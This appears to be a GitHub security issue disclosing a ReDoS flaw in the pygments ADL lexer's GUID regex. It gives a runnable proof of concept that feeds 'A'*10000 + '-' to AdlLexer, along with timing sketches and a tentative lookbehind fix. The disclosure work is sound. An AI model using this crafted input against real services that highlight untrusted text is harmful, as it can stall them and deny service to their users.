ReDoS Vulnerability in pygments archetype.py due to Inefficient Regex for GUID Matching (CWE-1333) #3058
Closed
Description
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the pygments project at pygments/lexers/archetype.py (line 296). The regex pattern (\d|[a-fA-F])+(-(\d|[a-fA-F])+){3,}, intended to match GUIDs, contains nested repeated groups and backtracks heavily on malicious input that only partially matches. This causes severe performance degradation and, with sufficiently large input, can block the application thread for a very long time. The issue falls under CWE-1333 (Inefficient Regular Expression Complexity).
Affected code:
pygments/pygments/lexers/archetype.py
Line 296 in c288c0e
(r'(\d|[a-fA-F])+(-(\d|[a-fA-F])+){3,}', Literal),
The latest main branch is currently affected, as are pygments releases <= 2.19.2.
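To look at the pattern in isolation, here is a minimal sketch that uses only the standard `re` module, without pygments. It assumes `re.search` is a fair stand-in for how the cost builds up: `search` retries the pattern from every start offset, and each attempt has to scan and then back off the remaining run of hex characters. The helper name `time_search` and the input sizes are illustrative. Absolute timings will differ from the lexer-based figure reported below.

```python
import re
import time

# Pattern copied from the report (pygments/lexers/archetype.py, line 296).
GUID_PATTERN = re.compile(r"(\d|[a-fA-F])+(-(\d|[a-fA-F])+){3,}")


def time_search(n):
    """Return (elapsed_seconds, match) for a run of n 'A's plus one hyphen."""
    text = "A" * n + "-"
    start = time.perf_counter()
    match = GUID_PATTERN.search(text)  # retried from every start offset
    return time.perf_counter() - start, match


if __name__ == "__main__":
    # Doubling n lets the growth rate be read off the elapsed column.
    for n in (500, 1000, 2000):
        elapsed, match = time_search(n)
        print(f"n={n:5d}  matched={match is not None}  elapsed={elapsed:.4f}s")
```

If the elapsed time grows clearly faster than the input length when `n` doubles, that is consistent with the super-linear behavior described above.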
POC Description
- Construct a malicious input string consisting of 10000 consecutive 'A' characters followed by a hyphen ("A"*10000 + "-").
- Pass the input to the AdlLexer from pygments.lexers and invoke the lex function for syntax highlighting (which triggers the vulnerable regex matching).
- The regex engine attempts exhaustive backtracking to resolve the partial match, leading to a significant delay (tested to take ~8 seconds for the 10001-character input).
- The delay confirms the ReDoS vulnerability is successfully triggered, as the matching process takes far longer than normal valid input processing.
POC Code (Minimal, Runnable)
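import time

from pygments import lex
from pygments.lexers import AdlLexer

# 10000 hex-like characters followed by a single hyphen: a partial GUID match.
malicious_input = "A" * 10000 + "-"
lexer = AdlLexer()

# lex() returns a generator, so list() forces the whole input to be tokenized.
start = time.perf_counter()
list(lex(malicious_input, lexer))
elapsed = time.perf_counter() - start
print(f"Elapsed time: {elapsed:.2f}s")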
# Vulnerability confirmed if elapsed time > 1s
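One possible mitigation, sketched here with the standard `re` module only, is to stop the pattern from starting in the middle of a run of hex characters. This is an assumption for illustration, not necessarily the fix adopted upstream, and whether a lookbehind suits the lexer's rule table would need checking against the ADL grammar. The names `ORIGINAL`, `GUARDED`, and `same_first_match` are hypothetical.

```python
import re

HEX = r"[\da-fA-F]"  # same characters as (\d|[a-fA-F]), as a single class

# Pattern quoted in the report.
ORIGINAL = re.compile(r"(\d|[a-fA-F])+(-(\d|[a-fA-F])+){3,}")

# Hypothetical alternative: the negative lookbehind rejects any attempt that
# begins right after another hex character, so a long run is scanned from
# its first character only instead of from every offset inside it.
GUARDED = re.compile(rf"(?<!{HEX}){HEX}+(?:-{HEX}+){{3,}}")


def same_first_match(text):
    """Check that both patterns find the same first match in text."""
    a, b = ORIGINAL.search(text), GUARDED.search(text)
    if a is None or b is None:
        return a is None and b is None
    return a.group(0) == b.group(0)


if __name__ == "__main__":
    guid = "550e8400-e29b-41d4-a716-446655440000"
    print(same_first_match(f"id = {guid};"))
    print(GUARDED.search("A" * 10000 + "-"))
```

The sketch compares results under `re.search` only. A lexer that calls `match` at an explicit position could behave differently when the preceding character has already been consumed by another token, so treat the comparison as a starting point for testing rather than proof of equivalence.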